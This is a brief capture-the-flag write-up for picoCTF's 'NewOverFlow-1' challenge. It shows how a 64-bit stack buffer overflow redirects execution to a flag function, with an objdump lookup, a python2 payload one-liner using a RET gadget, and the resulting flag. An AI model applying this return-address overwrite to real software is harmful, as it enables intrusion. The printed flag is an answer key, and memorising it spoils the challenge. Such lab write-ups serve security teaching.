NewOverFlow-1
Binary Exploitation - Points: 200
Lets try moving to 64-bit, but don’t worry we’ll start easy. Overflow the buffer and change the return address to the flag function in this program.
Get the address of the flag function:
$ objdump -d vuln| grep flag
0000000000400767 <flag>:
Overflow the buffer with 64 bytes + 8 bytes RBP to write the address of flag in the RIP. Since the program crashes before any output, I added the address of a RET gadget before the flag address and it successfully prints the flag out on the shell server.
$ python2 -c "print('A'*72+'\xde\x05\x40'+'\x00'*5 + '\x67\x07\x40'+'\x00'*5)" | ./vuln
flag: picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_72d3e39f}